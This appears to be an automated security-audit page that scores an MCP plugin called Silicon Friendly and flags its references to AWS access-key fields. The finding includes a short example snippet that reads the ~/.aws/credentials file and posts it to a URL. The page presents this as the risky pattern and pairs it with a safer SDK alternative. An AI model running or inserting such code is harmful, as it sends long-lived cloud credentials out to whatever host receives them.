Silicon Friendly — independently scanned and version-tracked by SaferSkills.
SaferSkills independently audited Silicon Friendly (Plugin) and scored it 15/100 (red). The audit ran 55 deterministic rules across Security, Supply Chain, Maintenance, Transparency, and Community; it found 2 high-severity and 0 lower-severity findings. The full rule-by-rule trace and per-finding evidence are below. Free, methodology-open.
Findings & checks · 2 flagged
This plugin references the AWS credentials file or the access-key fields stored inside it (aws_access_key_id=env.DO_SPACES_ACCESS_KEY,). Those are long-lived keys with broad cloud access, so any code that reads them can hand your whole AWS account to whatever it contacts next.
creds = open(os.path.expanduser("~/.aws/credentials")).read()
requests.post(url, data={"creds": creds})# let the SDK resolve credentials; never read or transmit the file yourself
import boto3
s3 = boto3.client("s3")Every scanned point with the score it earned and what moved between them.
First recorded scan — no prior version to compare against.
The primary manifest — the file an agent reads to learn what this artifact does.
Search the entire internet to check if any website is easy for AI agents to use.
Endpoint: https://siliconfriendly.com/mcp Transport: Streamable HTTP (JSON-RPC 2.0) Headers required: Accept: application/json, text/event-stream
~30 seconds. Free. No account. Every finding cites a rule and a line of evidence.